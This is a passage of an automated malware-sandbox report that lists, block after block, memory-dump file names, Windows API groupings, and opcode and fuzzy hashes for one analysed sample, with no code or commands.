                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 1ecc3b9e01b3335873ef607174c19ddb3ecac8dc0b27d9ef5282546bfaf382df
                            • Instruction ID: 592f74c9afebc9d09c6a7a9fe43c73895dc09e3de3442f605ea514b194ccda5a
                            • Opcode Fuzzy Hash: 1ecc3b9e01b3335873ef607174c19ddb3ecac8dc0b27d9ef5282546bfaf382df
                            • Instruction Fuzzy Hash: 1F816F32205B4486FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseDiskFreeGlobalMessagePeekSpaceUnlockwcsncpy
                            • String ID:
                            • API String ID: 833027430-0
                            • Opcode ID: 1858c4c27d96d342626d686266601d805f3c9d320734116cd528f245b75e8ad1
                            • Instruction ID: 1769304cd294e013a147466cf22cfa870df73598446d64eecaaa0db1985c63e6
                            • Opcode Fuzzy Hash: 1858c4c27d96d342626d686266601d805f3c9d320734116cd528f245b75e8ad1
                            • Instruction Fuzzy Hash: 55816F32605B4486FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 7a3d10c2a1ed4b693f4f67758080725c93c4dc6d79ecbba6c20d99efebf27a02
                            • Instruction ID: db3ae0595e5153713a6651476717d4381bd72430f3661e7cd645ff1e21dde516
                            • Opcode Fuzzy Hash: 7a3d10c2a1ed4b693f4f67758080725c93c4dc6d79ecbba6c20d99efebf27a02
                            • Instruction Fuzzy Hash: 15816F32205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_wcstoi64
                            • String ID:
                            • API String ID: 3633153638-0
                            • Opcode ID: 27140dc42f31309aa5fb14ee38f0d98c258488d577d5df56b39a339c431268b3
                            • Instruction ID: 28fa9b053f64b7fbc8dd3b4c1d7796df9131d9b8420f4c193e6f24b675bb27bb
                            • Opcode Fuzzy Hash: 27140dc42f31309aa5fb14ee38f0d98c258488d577d5df56b39a339c431268b3
                            • Instruction Fuzzy Hash: 43816F32205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 62584500bed59919d3310c89bbda246839bf2e6d243dceb6ac044779de045658
                            • Instruction ID: 78a9af25b59eee165bf2ef1c5bdfe416e83fbf2794bdf6d1147e57b8545cefd6
                            • Opcode Fuzzy Hash: 62584500bed59919d3310c89bbda246839bf2e6d243dceb6ac044779de045658
                            • Instruction Fuzzy Hash: 56816F32205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: fcac3cb5afb8eea675416279b75191692d5142a4b385ec4c3534b0be643f3cf3
                            • Instruction ID: 15c9cec44d5503a64e9f50aa99628b35af08039e31313cf9d6babccc29681579
                            • Opcode Fuzzy Hash: fcac3cb5afb8eea675416279b75191692d5142a4b385ec4c3534b0be643f3cf3
                            • Instruction Fuzzy Hash: 0C817132205B4086FB6B8B27E8547EA77A1F74DBE4F540116EB9A876F5CB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 942c085bff1e9e2ec19b8615e8a4fc9377c2af88fcc5109a856404e525e56bd3
                            • Instruction ID: 255fa19c16cadd1956829ed767789a99a9b6713d57ce744ca11219453cb27e60
                            • Opcode Fuzzy Hash: 942c085bff1e9e2ec19b8615e8a4fc9377c2af88fcc5109a856404e525e56bd3
                            • Instruction Fuzzy Hash: 8C81823260574086FB6B8B27E8547EA37A1F74DBE4F550116EB59876F5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: a10425cbddcdfc067869e2f99c229b0b489bd1fdf293c2ecce2ad64b34909482
                            • Instruction ID: 46ae82080e6d2722c06382c461360da3da95cb7602a3fd7566ff8fcdb9634c26
                            • Opcode Fuzzy Hash: a10425cbddcdfc067869e2f99c229b0b489bd1fdf293c2ecce2ad64b34909482
                            • Instruction Fuzzy Hash: 6B816032605B4486FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$CloseCreateMessageMutexSleepThread$ClipboardCodeExitGlobalHandlePeekPostUnlock
                            • String ID:
                            • API String ID: 4035754557-0
                            • Opcode ID: b672400f8117c28a6b1a7ff70a7bbc705aa9f611639b68c0f81ab5e98d7ab052
                            • Instruction ID: 203e0308146d4bcf3db9030e3f41921eb0484e3fa917d430e614d5f8b44563e6
                            • Opcode Fuzzy Hash: b672400f8117c28a6b1a7ff70a7bbc705aa9f611639b68c0f81ab5e98d7ab052
                            • Instruction Fuzzy Hash: 58816F32605B4486FB6B8B27E8847EA77A1F74DBE4F540116EB5947AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalKeyboardLayoutMessagePeekUnlock
                            • String ID:
                            • API String ID: 2243892272-0
                            • Opcode ID: edd75da60a5ec7496a9d8016f1fc62ac6eeb410bc4236d6580506c5501078959
                            • Instruction ID: bf6bafbc4eec3ba63a4bd4b3b761da4afca073a8526ab3d935d6e5352bfabbb9
                            • Opcode Fuzzy Hash: edd75da60a5ec7496a9d8016f1fc62ac6eeb410bc4236d6580506c5501078959
                            • Instruction Fuzzy Hash: 06816032205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: e3f3f4a04049e445f937055836e9be217537e9b1830e1cce1cf06cb39e579cd3
                            • Instruction ID: 4a9b01835c314e9a3ba18d6c725d5616d65ab95475d1801a63c950bf1d58588e
                            • Opcode Fuzzy Hash: e3f3f4a04049e445f937055836e9be217537e9b1830e1cce1cf06cb39e579cd3
                            • Instruction Fuzzy Hash: 4C816F32205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ErrorLast$ClipboardCloseDeleteFileGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 3770565981-0
                            • Opcode ID: 272c2640f138618e031d3f936a2da3561c16cd42b8c396dedd32d2e6da0292ac
                            • Instruction ID: 089727375af495d3798bc54dd5fbc52f2806c9aa14155a27d7ad364ebdf95914
                            • Opcode Fuzzy Hash: 272c2640f138618e031d3f936a2da3561c16cd42b8c396dedd32d2e6da0292ac
                            • Instruction Fuzzy Hash: 03816032205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseFileFullGlobalMessageNameOperationPathPeekUnlock
                            • String ID:
                            • API String ID: 1286959346-0
                            • Opcode ID: 28d453a4c1f76abccf10b69cad456417ef7c78d79d6e2abc40cfd15fae3d8dd1
                            • Instruction ID: dca79b81b6ffce34b9c1ace820e9d399f96dda2ad5c1c1b6c27ed24283b25a86
                            • Opcode Fuzzy Hash: 28d453a4c1f76abccf10b69cad456417ef7c78d79d6e2abc40cfd15fae3d8dd1
                            • Instruction Fuzzy Hash: 41816F32205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseCreateGlobalInitializeInstanceMessagePeekUnlock
                            • String ID:
                            • API String ID: 2299052934-0
                            • Opcode ID: 4ad51f065ecd6a0c46c1aa3ad28ebcf5da51835cee1e7061751f3bbf368cea7b
                            • Instruction ID: 4becf56a522271b2a1cfc175eaf1daa34730be77c28ac9c4aef37f36c445ead3
                            • Opcode Fuzzy Hash: 4ad51f065ecd6a0c46c1aa3ad28ebcf5da51835cee1e7061751f3bbf368cea7b
                            • Instruction Fuzzy Hash: B2815F32605B4486FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$Message$ClipboardCloseGlobalPeekSendUnlock
                            • String ID:
                            • API String ID: 1853169715-0
                            • Opcode ID: ff4cf9b32d15cfd12f0d40df7ae9b342386a6c45fcfcc285a6066610ca7c589c
                            • Instruction ID: 81d14038e6cbdc7634828626ee91e0fa15e542ca7f3486b293df7cd97ec09319
                            • Opcode Fuzzy Hash: ff4cf9b32d15cfd12f0d40df7ae9b342386a6c45fcfcc285a6066610ca7c589c
                            • Instruction Fuzzy Hash: BD816032605B4486FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$Message$ClipboardCloseGlobalPeekSendUnlock
                            • String ID:
                            • API String ID: 1853169715-0
                            • Opcode ID: 048cce2ea624406cc66437a82a6b6249a9245b19766e315293c706e7cbf3660c
                            • Instruction ID: 9bbd258bbc1b3becc906f99d0b451fcc380179e839822b7fe0307e120255447e
                            • Opcode Fuzzy Hash: 048cce2ea624406cc66437a82a6b6249a9245b19766e315293c706e7cbf3660c
                            • Instruction Fuzzy Hash: B3816032605B4486FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$Message$ClipboardCloseGlobalPeekSendUnlock
                            • String ID:
                            • API String ID: 1853169715-0
                            • Opcode ID: 461afedf34f24690d3a97965ae2f15f6dfc15f4607cb3e94bfc7bcb18700a9b9
                            • Instruction ID: eb3bcded1d992783570f6a940a48882ec5319b43223a39d04989f7bde91d8619
                            • Opcode Fuzzy Hash: 461afedf34f24690d3a97965ae2f15f6dfc15f4607cb3e94bfc7bcb18700a9b9
                            • Instruction Fuzzy Hash: D7816032605B4486FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%
